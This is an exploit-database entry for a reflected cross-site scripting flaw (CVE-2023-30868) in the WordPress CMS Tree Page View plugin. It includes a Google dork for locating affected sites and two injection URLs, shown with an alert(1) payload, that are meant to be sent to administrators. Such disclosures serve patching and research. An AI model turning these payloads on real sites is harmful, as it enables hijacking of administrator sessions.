Share
## https://sploitus.com/exploit?id=PACKETSTORM:172730
# Exploit Title: Tree Page View Plugin 1.6.7 - Cross Site Scripting (XSS)  
# Google Dork: inurl:/wp-content/plugins/cms-tree-page-view/  
# Date: 2023-04-24  
# Exploit Author: LEE SE HYOUNG (hackintoanetwork)  
# Vendor Homepage: https://wordpress.org/plugins/cms-tree-page-view/  
# Software Link: https://downloads.wordpress.org/plugin/cms-tree-page-view.1.6.6.zip  
# Category: Web Application  
# Version: 1.6.7  
# Tested on: Debian / WordPress 6.1.1  
# CVE : CVE-2023-30868  
# Reference: https://patchstack.com/database/vulnerability/cms-tree-page-view/wordpress-cms-tree-page-view-plugin-1-6-7-cross-site-scripting-xss-vulnerability?_s_id=cve  
  
# 1. Technical Description:  
The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7.  
This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.  
  
  
# 2. Proof of Concept (PoC):  
  
WordPress CMS Tree Page View Plugin <= 1.6.7 Cross-Site Scripting (XSS)  
In the case of this vulnerability, there are two XSS PoCs available: one for version 1.6.6 and another for version 1.6.7.  
  
1. CMS Tree Page View Plugin <= 1.6.6  
  
a. Send the following URL to users with administrator privileges or higher: http://localhost:8888/wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E.  
  
b. your payload will be executed. [!] note : To make the payload work, the "In menu" option under Settings -> CMS Tree Page View -> Select where to show a tree for pages and custom post types needs to be enabled for posts.  
  
2. CMS Tree Page View Plugin <= 1.6.7  
  
a. Send the following URL to users with administrator privileges or higher: http://localhost:8888/wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22+accesskey%3DC+onclick%3Djavascript%3Aalert%281%29%3B+a%3D%22.  
  
b. Your payload will execute the script when the user presses Ctrl + Alt + c (Mac) or Alt + Shift + c (Windows).  
[!] note : To make the payload work, the "In menu" option under Settings -> CMS Tree Page View -> Select where to show a tree for pages and custom post types needs to be enabled for posts.